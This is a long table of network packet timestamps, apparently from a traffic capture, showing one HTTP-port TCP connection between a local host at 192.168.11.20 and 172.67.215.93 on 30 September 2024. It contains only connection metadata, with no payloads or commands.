Sep 30, 2024 15:10:14.884388924 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.884424925 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.884517908 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.884651899 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.884674072 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.884687901 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.884862900 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.884866953 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.884907007 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.884917021 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.885077000 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.885210037 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.885230064 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.885246992 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.885258913 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.885277987 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.885396004 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.885417938 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.885421038 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.885447025 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.885468960 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.885587931 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.885756969 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.887007952 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.887033939 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.887196064 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.887222052 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.887298107 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.887317896 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.887336969 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.887356043 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.887495995 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.887516975 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.887537956 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.887542009 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.887542009 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.887569904 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.887589931 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.887655020 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.887674093 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.887692928 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.887706041 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.887706041 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.887726068 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.887746096 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.887814045 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.887835979 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.887852907 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.887871981 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.887877941 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.888050079 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.888050079 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.888050079 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.888091087 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.888132095 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.888153076 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.888366938 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.888386011 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.888386011 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.888420105 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.888441086 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.888462067 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.888483047 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.888501883 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.888519049 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.888537884 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.888556004 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.888664007 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.888683081 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.888700962 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.888720036 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.888725996 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.888725996 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.888751984 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.888770103 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.888788939 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.888808966 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.888840914 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.888859034 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.888900042 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.888900042 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.888930082 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.888950109 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.889024019 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.889043093 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.889065981 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.889066935 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.889113903 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.889168024 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.889235973 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.889235973 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.889259100 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.889296055 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.889408112 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.889411926 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.889411926 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.889437914 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.889549971 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.889570951 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.889575958 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.889575958 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.889750004 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.889753103 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.889776945 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.889796019 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.889815092 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.889844894 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.889863968 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.889884949 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.889915943 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.889997005 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.890016079 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.890044928 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.890062094 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.890079021 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.890085936 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.890085936 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.890108109 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.890125990 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.890160084 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.890177965 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.890255928 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.890255928 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.890271902 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.890291929 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.890403032 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.890425920 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.890425920 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.890547991 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.890597105 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.890597105 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.890765905 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.890863895 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.890996933 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.891105890 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.891154051 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.891165972 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.891324997 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.891453028 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.891594887 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.891623020 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.891643047 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.891832113 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.891849995 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.891866922 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.891901970 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.891921997 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.891936064 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.891961098 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.891983986 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.892075062 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.892093897 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.892153978 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.892242908 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.892323971 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.892324924 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.892493010 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.892678022 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.892755985 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.892776012 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.892793894 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.892812014 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.892829895 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.892851114 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.892868996 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.892883062 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.892895937 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.892914057 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.892931938 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.892942905 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.892961979 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.892980099 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.892997980 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.893035889 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.893101931 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.893271923 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.893271923 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.893301010 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.893340111 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.893358946 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.893443108 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.893537998 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.893593073 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.893613100 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.893615961 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.893615961 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.893660069 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.893781900 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.893795013 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.893838882 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.893953085 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.894077063 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.894097090 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.894121885 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.894121885 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.894171000 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.894292116 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.894324064 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.894435883 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.894462109 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.894583941 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.894632101 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.894632101 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.894665003 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.894711971 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.894731045 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.894750118 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.894768000 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.894800901 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.894826889 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.894848108 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.894865036 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.894881964 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.894917011 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.894936085 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.894972086 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.894982100 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.895000935 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.895144939 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.895144939 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.895144939 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.895181894 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.895220995 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.895241976 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.895277977 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.895298004 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.895312071 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.895325899 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.895356894 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.895370960 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.895482063 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.895482063 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.895652056 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.123229980 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.123307943 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.123327971 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.123347998 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.123400927 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.123420000 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.123439074 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.123456955 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.123547077 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.123547077 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.123622894 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.123641968 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.123661041 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.123680115 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.123697996 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.123714924 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.123723984 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.123743057 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.123791933 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.123811007 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.123814106 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.123814106 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.123840094 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.123899937 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.123919010 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.123980999 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.124113083 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.124150991 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.124150991 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.124150991 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.124209881 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.124321938 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.124386072 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.124492884 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.124495983 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.124547958 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.124660969 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.124783993 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.124803066 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.124820948 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.124830961 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.124847889 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.124866962 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.124885082 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.124902964 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.124919891 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.124938011 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125001907 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.125081062 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125099897 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125117064 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125134945 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125153065 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125170946 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125175953 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.125175953 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.125200987 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125220060 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125237942 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125256062 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125266075 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.125386000 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125403881 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125421047 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125436068 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.125447035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125466108 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125499010 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125516891 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125567913 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125608921 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.125608921 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.125637054 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125776052 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.125776052 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.125794888 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125813007 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125832081 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125849962 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125885010 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125932932 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125945091 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.125961065 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.125994921 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.126055956 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.126075029 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.126116037 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.126116037 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.126285076 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.126296043 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.126315117 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.126332998 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.126352072 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.126369953 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.126430035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.126447916 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.126456976 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.126456976 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.126478910 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.126497030 CEST	80	49754	172.67.215.93	192.168.11.20
